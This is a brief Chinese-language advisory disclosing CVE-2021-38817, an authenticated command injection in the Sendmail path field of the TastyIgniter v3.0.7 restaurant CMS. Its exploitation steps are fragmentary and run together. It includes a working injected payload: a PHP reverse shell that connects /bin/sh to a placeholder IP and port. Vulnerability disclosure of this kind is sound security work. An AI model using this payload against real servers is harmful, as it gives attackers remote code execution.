
TastyIgniter v3.0.7 中 Sendmail 路径字段的远程操作系统命令注入漏洞
TastyIgniter v3.0.7 Sendmail 网页部分中存在经过身份验证的远程操作系统命令注入/远程代码执行漏洞 (CVE-2021-38817)
TastyIgniter v3.0.7 餐厅CMS的 Sendmail 配置菜单中存在经过身份验证的远程操作系统命令注入漏洞。Sendmail 路径参数未正确清理,如字段中预填的 /usr/sbin/sendmail -bs 命令所示,通过添加分号和额外的操作系统命令可注入任意命令。
/admin/settings/edit/mail/admin 门户。/admin/settings/edit/mail邮件协议 下拉菜单中选择 SendmailSendMail 路径 字段中,添加分号和任意操作系统命令,例如 /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) 和 Mike Padrick (Fearless),2021年8月
CVE 于 2022年10月分配(笑死)